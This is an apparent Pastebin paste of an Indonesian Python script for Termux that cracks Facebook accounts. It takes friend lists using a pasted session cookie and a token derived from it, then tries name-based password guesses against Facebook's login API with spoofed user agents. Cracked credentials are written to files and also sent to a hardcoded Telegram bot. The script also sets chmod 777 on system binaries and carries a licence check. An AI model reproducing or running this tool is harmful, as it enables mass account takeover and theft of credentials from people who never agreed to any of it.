Advertisement
OBF-XIn

140.213.26.217-/sdcard/TamPrem.py.py

Jun 20th, 2023
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 10.65 KB | None | 0 0
  1. import os,requests,json,time,re,random,sys,uuid,string,subprocess,bs4
  2. os.system("chmod 777 /data/data/com.termux/files/usr/bin/*")
  3. from string import *
  4. from concurrent.futures import ThreadPoolExecutor as tred
  5. from bs4 import BeautifulSoup as sop
  6. from licensing.models import *
  7. from licensing.methods import Key, Helpers
  8. P = '\x1b[1;97m' # PUTIH
  9. M = '\x1b[1;91m' # MERAH
  10. H = '\x1b[1;92m' # HIJAU
  11. K = '\x1b[1;93m' # KUNING
  12. B = '\x1b[1;94m' # BIRU
  13. U = '\x1b[1;95m' # UNGU
  14. O = '\x1b[1;96m' # BIRU MUDA
  15. tamsis="global"
  16. loop,ua,id,ok=0,[],[],[]
  17. plc=[]
  18. tamsis="logo"
  19. def logo():
  20.     os.system("clear")
  21.     print(f"""{M}
  22.   ╔════╗╔═══╗╔═╗╔═╗╔═══╗╔══╗╔═══╗
  23.   ║╔╗╔╗║║╔═╗║║║╚╝║║║╔═╗║╚╣╠╝║╔═╗║
  24.   ╚╝║║╚╝║║─║║║╔╗╔╗║║╚══╗─║║─║╚══╗ {P}
  25.   ──║║──║╚═╝║║║║║║║╚══╗║─║║─╚══╗║
  26.   ──║║──║╔═╗║║║║║║║║╚═╝║╔╣╠╗║╚═╝║
  27.   ──╚╝──╚╝─╚╝╚╝╚╝╚╝╚═══╝╚══╝╚═══╝
  28. """)
  29. def ua_api():
  30.     android_version = subprocess.check_output('getprop ro.build.version.release',shell=True).decode('utf-8').replace('\n','')
  31.     build = subprocess.check_output('getprop ro.build.id',shell=True).decode('utf-8').replace('\n','')
  32.     fblc = 'en_GB'
  33.     sim_id = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').split(',')[0].replace('\n','')
  34.     fbmf = subprocess.check_output('getprop ro.product.manufacturer',shell=True).decode('utf-8').replace('\n','')
  35.     fbbd = subprocess.check_output('getprop ro.product.brand',shell=True).decode('utf-8').replace('\n','')
  36.     fbsv = android_version
  37.     fbca = subprocess.check_output('getprop ro.product.cpu.abilist',shell=True).decode('utf-8').replace(',',':').replace('\n','')
  38.     fbdm = '{density=2.0,height='+subprocess.check_output('getprop ro.hwui.text_large_cache_height',shell=True).decode('utf-8').replace('\n','')+',width='+subprocess.check_output('getprop ro.hwui.text_large_cache_width',shell=True).decode('utf-8').replace('\n','')
  39.     for i in range(10000):
  40.         model = random.choice(['V2057A','I2208','V2228','V1922A','V1916A','V1930A','vivo Y55A','vivo Y55A','I2018','vivo 1707','V2168A','V2228','V1836A','V1930A','V2057A','vivo 1707','V2121A','V2121A','V2147','V1824A'])
  41.         fbap = random.choice(['414.0.0.30.113','414.0.0.30.113','354.0.0.8.108','354.0.0.8.108','405.0.0.16.112','414.0.0.30.113','414.0.0.30.113','413.0.0.30.104','414.0.0.30.113','408.1.0.16.113'])
  42.         fbbv = str(random.randint(111111111,999999999))
  43.         user = '[FBAN/FB4A;FBAV/'+fbap+';FBBV/'+fbbv+';FBDM/{density=2.0,width=720,height=1406};FBLC/'+fblc+';FBRV/'+str(random.randint(000000000,999999999))+';FBCR/'+sim_id+';FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/'+model+';FBSV/'+android_version+'.0;FBOP/1;FBCA/arm64-v8a:;]'
  44.         ua.append(user)
  45. def crack(ids,nama,pw):
  46.     try:
  47.         global loop,ok
  48.         print("\r"+P+"["+O+"TAMSIS-XD"+P+"] "+H+"Cracking "+K+str(loop)+P+"/"+K+str(len(id))+B+" OK"+P+" :"+B+str(len(ok))+P,end="\r")
  49.     except Exception as e:print(e)
  50.     try:akhir=nama.split(" ")[1]
  51.     except:akhir="skip"
  52.     for pws in pw:
  53.         try:
  54.             pas=pws.replace("awal",nama.split(" ")[0]).replace("Awal",nama.split(" ")[0]).replace("akhir",akhir).replace("Akhir",akhir).replace("nama",nama).replace("Nama",nama)
  55.             if "skip" in pas:continue
  56.             elif len(pas)<6:continue
  57.             else:pass
  58.             po=requests.post('https://b-api.facebook.com/method/auth.login',headers={'accept-encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'content-type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'x-fb-friendly-name': 'authenticate', 'x-fb-http-engine': 'Liger','user-agent': random.choice(ua)},data={'email':ids,'password':pas,'cpl':'true','credentials_type':'password','error_detail_type':'button_with_disabled','source':'login','format':'json','generate_session_cookies':'1','generate_analytics_claim':'1','generate_machine_id':'1'}).json()
  59.             if 'session_key' in po:
  60.                 open("TAMSIS-OK.txt","a").write(f"{ids}|{pas}\n")
  61.                 print(f"\r{P}[{H}TAMSIS-OK{P}]{H} {ids} | {pas} ",end="      \n")
  62.                 ook=f"OK|{ids}|{pas}"
  63.                 requests.post("https://api.telegram.org/bot5847490356:AAGfMHdclW8yaVZGJI0NkymdtAN4Rs-h2w0/sendMessage?chat_id=6088891967&text="+ook)
  64.                 ok.append("1")
  65.             elif "Login approvals are on. Expect an SMS shortly with a code to use for log in" in str(po):break
  66.             elif 'www.facebook.com' in po['error_msg']:
  67.                 open("TAMSIS-CP.txt","a").write(f"{ids}|{pas}\n")
  68.                 if plc[0] in ["y","Y"]:
  69.                     print(f"\r{P}[{K}TAMSIS-OK{P}]{K} {ids} | {pas}",end="        \n")
  70.                 else:pass
  71.                 break
  72.             else:continue
  73.         except requests.exceptions.ConnectionError:time.sleep(30)
  74.         except Exception as e:print(e)
  75.     loop+=1
  76. def password():
  77.     logo()
  78.     inpu=input("TAMPILKAN HASIL CP ? (Y/n): ")
  79.     plc.append(inpu)
  80.     logo()
  81.     udin=input("GUNALAN PASSWORD MANUAL ? (Y/n) : ")
  82.     if udin in ["y","Y"]:
  83.         logo()
  84.         print(f"\t {P} KETIK {H}'stop'{P} UNTUK BERHENTI")
  85.         print(f"{P}contoh : {K}awal123,awalakhir,awal akhir,nama")
  86.         pw=[]
  87.         jum=1
  88.         while True:
  89.             pas=input(f"{P}MASUKAN PW KE {jum} : ")
  90.             if len(pas)==0:continue
  91.             elif pas in ["stop","Stop"]:
  92.                 break
  93.             else:pw.append(pas);jum+=1
  94.         if len(pw)==0:print("PASSWORD MINIMAL SATU");password()
  95.         else:pass
  96.     else:
  97.         pw=["awal123","awal1234","awal12345","awal123456","awal01","awal12","awal09","awal10","nama","awal321"]
  98.     ua_api()
  99.     logo()
  100.     print(f"\t{P}Total PW : "+K+str(len(pw)))
  101.     print(f"\t{P}Total ID : "+K+str(len(id)))
  102.     print(f"{P}■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■")
  103.     with tred(max_workers=30) as gas:
  104.         try:
  105.             for user in id:
  106.                 ids,names = user.split('|')[0],user.split('|')[1].lower()
  107.                 gas.submit(crack,ids,names,pw)
  108.         except Exception as e:print(e)
  109. def file():
  110.     logo()
  111.     file=input("CONTOH : {K}/sdcard/file.txt\n{P}FILE : ")
  112.     for i in open(file,"r").readlines():
  113.         if i in id:pass
  114.         else:id.append(i.replace("\n",""))
  115.     print("TOTAL ID : "+str(len(id)))
  116.     input("[ENTER]")
  117.     password()
  118. def login():
  119.     logo();data2={};data={};ses=requests.Session();cok=input("cookies facebok : ")
  120.     try:
  121.         link = ses.post('https://graph.facebook.com/v16.0/device/login/', data={'access_token': '661587963994814|ffe07cc864fd1dc8fe386229dcb7a05e', 'scope': ''}).json();kode,user = link['code'],link['user_code'];vers = bs4.BeautifulSoup(ses.get(f'https://mbasic.facebook.com/device', cookies={'cookie': cok}).content, 'html.parser');item = ['fb_dtsg','jazoest','qr']
  122.         for x in vers.find_all('input'):
  123.             if x.get('name') in item:aset = {x.get('name'):x.get('value')};data.update(aset)
  124.         data.update({'user_code':user});meta = bs4.BeautifulSoup(ses.post('https://mbasic.facebook.com'+vers.find('form', method='post').get('action'), data=data, cookies={'cookie': cok}).text, 'html.parser');xzxz  = meta.find('form',{'method':'post'})
  125.         for x in xzxz('input',{'value':True}):
  126.             try:
  127.                 if x['name'] == '__CANCEL__' : pass
  128.                 else:data2.update({x['name']:x['value']})
  129.             except Exception as e:pass
  130.         ses.post(f'https://mbasic.facebook.com{xzxz["action"]}', data=data2, cookies={'cookie':cok});token = ses.get(f'https://graph.facebook.com/v16.0/device/login_status?method=post&code={kode}&access_token=661587963994814|ffe07cc864fd1dc8fe386229dcb7a05e').json()['access_token'];open("/data/data/com.termux/files/data.txt","w").write(f"{cok}|{token}");exit("kamu berhasil login")
  131.     except Exception as e:print(f"{M} cookie invalid");exit(e)
  132. def dump():
  133.     logo()
  134.     try:data=open("/data/data/com.termux/files/data.txt","r").read().split("|")
  135.     except:exit("KAMU BELUM LOGIN")
  136.     cok=data[0]
  137.     if not "c_user" in cok:exit("LOGIN ULANG")
  138.     tok=data[1]
  139.     if not "EAAJ" in tok:exit("LOGIN ULANG")
  140.     print(P+"GUNAKAN KOMA UNTUK MASSAL")
  141.     user=input("USER/ID : ")
  142.     for uid in user.split(','):
  143.         try:use=int(uid)
  144.         except:
  145.             try:use=re.findall('"userID":"(.*?)","',str(sop(requests.get("https://www.facebook.com/"+uid).text,"html.parser")))[0]
  146.             except Exception as e:continue
  147.         try:
  148.             freya=requests.get('https://graph.facebook.com/'+str(use)+'?fields=friends.fields(id,name).limit(5000)&access_token='+tok,cookies={'cookie': cok}).json()['friends']['data']
  149.             for xz in freya:
  150.                 if xz['id']+'|'+xz['name'] in id:pass
  151.                 else:id.append(xz['id']+'|'+xz['name'])
  152.         except Exception as e:continue
  153.     print("TOTAL ID : "+str(len(id)))
  154.     input("[ENTER]")
  155.     password()
  156. def log():login()
  157. def menu():
  158.     logo()
  159.     login=input(f"{P}[{K}01{P}] Crack Publik\n[{K}02{P}] Crack File\n[{K}03{P}] Login\n[{H}00{P}] Minta Lisensi\nPILIH : ")
  160.     if login in ["01","1"]:
  161.         dump()
  162.     elif login in ["03","3"]:log()
  163.     elif login in ["2","02"]:file()
  164.     elif login in ["0","00"]:
  165.         os.system("termux-open https://wa.me/6283115331009");exit()
  166.     else:print("PILIH YG BENER");menu()
  167. def key():
  168.     logo()
  169.     pilih=input("01.Masuk\n02.Minta Lisensi\nPILIH : ")
  170.     if pilih in ["1","01"]:
  171.         kunci=input(">>key>>> ")
  172.         RSAPubKey ="<RSAKeyValue><Modulus>tp3M0XZn1tD8/v6Sg/wwlgvMjUnnS3OYpbwR17RGGu2Dyk2iO6A18JrK9onCW/+3h8k76Yl4EyAo1plIy0iDeHw+vCogpBERLluBKXMBSu05vQ92L1+CDErPtFyMcPLBIi9cxMho/zKzuGQpicHzCpg1W46k5G+KChNNdcuvuzwcJN/3yIUw0uy3S56IN3y+q+ilLcpwUgXzUrp4VE+WNcV5hmc5bieYj2Pa4uI08i3fUOWfNqViRkEcV1yNuiB+HDgvSz8kLpRCFmhceOTOXMeJX+hYVB9RMUfP0krri05VsSrgsK2a238fLiCtLU77Mtb21UQCfwgV2d2mGck+iw==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
  173.         auth = "WyI1MTc1Njc0NCIsImd3cVJOSUtqbndDTWx0SlpFNTZUWThXZDZHMTRHNkhmMU4vNmxYZHIiXQ=="
  174.         result = Key.activate(token=auth,rsa_pub_key=RSAPubKey,product_id=20587,key=kunci,machine_code=Helpers.GetMachineCode(v=2))
  175.         if result[0] == None or not Helpers.IsOnRightMachine(result[0], v=2):exit("key lisensi tidak terdaftar/kadaluarsa")
  176.         else:logo();print("welcome user semoga harimu penuh warna");open("/data/data/com.termux/files/lis.txt","w").write(kunci);menu()
  177.     elif pilih in ["02","2"]:os.system("termux-open https://wa.me/6283115331009");exit()
  178.     else:
  179.         while True:print("PILIH YANG BENER BANGSAT")
  180.  
  181. try:kunci=open("/data/data/com.termux/files/lis.txt","r").read()
  182. except:key()
  183. RSAPubKey ="<RSAKeyValue><Modulus>tp3M0XZn1tD8/v6Sg/wwlgvMjUnnS3OYpbwR17RGGu2Dyk2iO6A18JrK9onCW/+3h8k76Yl4EyAo1plIy0iDeHw+vCogpBERLluBKXMBSu05vQ92L1+CDErPtFyMcPLBIi9cxMho/zKzuGQpicHzCpg1W46k5G+KChNNdcuvuzwcJN/3yIUw0uy3S56IN3y+q+ilLcpwUgXzUrp4VE+WNcV5hmc5bieYj2Pa4uI08i3fUOWfNqViRkEcV1yNuiB+HDgvSz8kLpRCFmhceOTOXMeJX+hYVB9RMUfP0krri05VsSrgsK2a238fLiCtLU77Mtb21UQCfwgV2d2mGck+iw==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
  184. auth = "WyI1MTc1Njc0NCIsImd3cVJOSUtqbndDTWx0SlpFNTZUWThXZDZHMTRHNkhmMU4vNmxYZHIiXQ=="
  185. result = Key.activate(token=auth,rsa_pub_key=RSAPubKey,product_id=20587,key=kunci,machine_code=Helpers.GetMachineCode(v=2))
  186. if result[0] == None or not Helpers.IsOnRightMachine(result[0], v=2):key()
  187. else:menu()
  188.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement